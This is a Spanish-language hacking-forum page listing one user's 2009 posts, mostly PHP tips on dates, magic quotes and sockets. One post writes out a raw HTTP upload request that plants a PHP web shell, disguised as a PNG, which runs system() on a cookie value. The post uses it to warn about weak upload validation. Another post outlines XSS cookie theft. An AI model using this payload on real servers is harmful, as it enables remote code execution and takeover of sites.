Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#3821
también está strtotime() para pasar de string a formato unix y date() para pasar de formato unix a texto.
Código (php) [Seleccionar]
<?php
echo htmlspecialchars(cambia('10 September 2000''Y/m/d'), ENT_QUOTES);

function 
cambia($fecha$formato){
 return 
date($formatostrtotime($fecha));
}
?>
#3822
PHP / Re: Pequeños trucos en PHP
24 Agosto 2009, 05:33 AM
más corto:
Código (php) [Seleccionar]
<?php
$_GET 
stripslashses_gpc($_GET);
$_POST stripslashses_gpc($_POST);
$_COOKIE stripslashses_gpc($_COOKIE);
$_SERVER stripslashses_gpc($_SERVER);
 
function 
stripslashses_gpc($buffer){
 if(!
function_exists('get_magic_quotes_gpc'))
  return 
$buffer;
 if(
get_magic_quotes_gpc()){
  if(
is_array($buffer)){
   foreach(
$buffer as $variable => $valor){
    
$temp[$variable] = stripslashses_gpc($valor);
   }
   return 
$temp;
  }else{
   return 
stripslashes($buffer);
  }
 }else{
  return 
$buffer;
 }
}
?>


Y con array_map() es más corto.
#3823
se puede spoofear y no sirve ni como medida de protección secundaria ni tercera ni ultima ya que no puedes dar un tipo de protección que sabes que puede ser falseado. Si el sistema tiene xss también puede obtenerse la referencia desde javascript y enviar cada dato al atacante asi que mejor te recomiendo a lo mortal... user y pass.
#3824
con eso yo fácilmente podría subirle un php y hacer código de ejecución remota:

Citartelnet web.com 80
POST /test.php HTTP/1.1
Host: web.com
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------15890672924370
Content-Length: 251

-----------------------------15890672924370
Content-Disposition: form-data; name="archivo"; filename="shell.php"
Content-Type: image/png

<?php echo nl2br(htmlspecialchars(system($_COOKIE['eval']), ENT_QUOTES)); ?><br /><?php phpinfo(); ?>

y si le pongo comillas al título y demás puedo causar una inyección sql.

Mejor verifica extensiones basados en strpos tomando los ultimos tres o cuatro carácteres segín la extensión a comparar y devuelves true o false si es permitido o no y asegurate siempre de utilizar mysq escape real string para evitar las inyecciones. Si quieres algo mas avanzado y evitar que se ejecuten via LFI aunque sean subidas con extensión jpg utiliza gd.
#3825
PHP / Re: sockets
24 Agosto 2009, 05:03 AM
Código (php) [Seleccionar]
<?php
$buffer 
'GET / HTTP/1.1
Host: foro.elhacker.net
Connection: close
User-Agent: agente de usuario 0.00001 beta alpha rc (huevo)
Referer: www.coolmod.com

'
;

if(!
$handle fsockopen('foro.elhacker.net'80))
 die(
'El servidor no responde!');
if(!
fwrite($handle$buffer))
 die(
'Error en el servidor!');
unset(
$buffer);
while(!
feof($handle)){
 
$buffer .= fgets($handle128);
}
fclose($handle);
if(!
$buffer)
 die(
'El servidor no responde!');

if(
is_array($cookies desde_hasta('Set-Cookie: '';'$bufferfalsetrue))){
 foreach(
$cookies as $numero => $cookie){
  if(
eregi('phpsessid='$cookie)){
   
$phpsessid $cookie.'; ';
  }else{
   
$retorno .= $cookie.'; ';
  }
  unset(
$cookie); unset($numero);
 }
 unset(
$cookies);
 echo 
htmlspecialchars('Cookies: '.$retorno.$phpsessidENT_QUOTES);
}else{
 die(
'Imposible obtener los datos!');
}

function 
desde_hasta($desde$hasta$contenido$cantidad false$retornar_todo false){
 if(
eregi($desde ,$contenido)){
  
$retorno explode($desde$contenido);
  foreach(
$retorno as $compara){
   
$compara explode($hasta$compara);
   if(
$compara $compara[0])
    
$retorna[] = $compara;
   unset(
$compara);
  }
  if(
$retornar_todo){
   unset(
$retorna[0]);
   return 
$retorna;
  }
  if(
is_numeric($cantidad)){
   
$retorno $retorna[$cantidad];
  }else{
   
$retorno $retorna[1];
  }
  return 
$retorno;
 }else{
  return 
false;
 }
}
?>
#3826
PHP / Re: Seguridad contra CSRF
24 Agosto 2009, 04:43 AM
cual comentario?
#3827
Hola, sip eso es xss.
lo que puedes lograr hacer es obtener la cookie de alguien pero necesiatrías que alguien viera un link y que ese alguien esté logueado en algún sistema de administración o algo.
Busca acá:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_10809-t244090.0.html
hay buenos tutos sobre XSS.
Si tienes duda sobre alguno nos cuentas.
#3828
esque sabe poco, si supiera mucho sería be larga
#3829
si fuera 17 de septiembre sabría quien es xD pero no jaja
#3830
no puede serr!!!!!

ya encontraba extraño que me dieran a adivinar una palabra de un solo carácter y me sale con undefined como respuesta >:(

quiero mi puntaje devueltaaaaaaa!!!!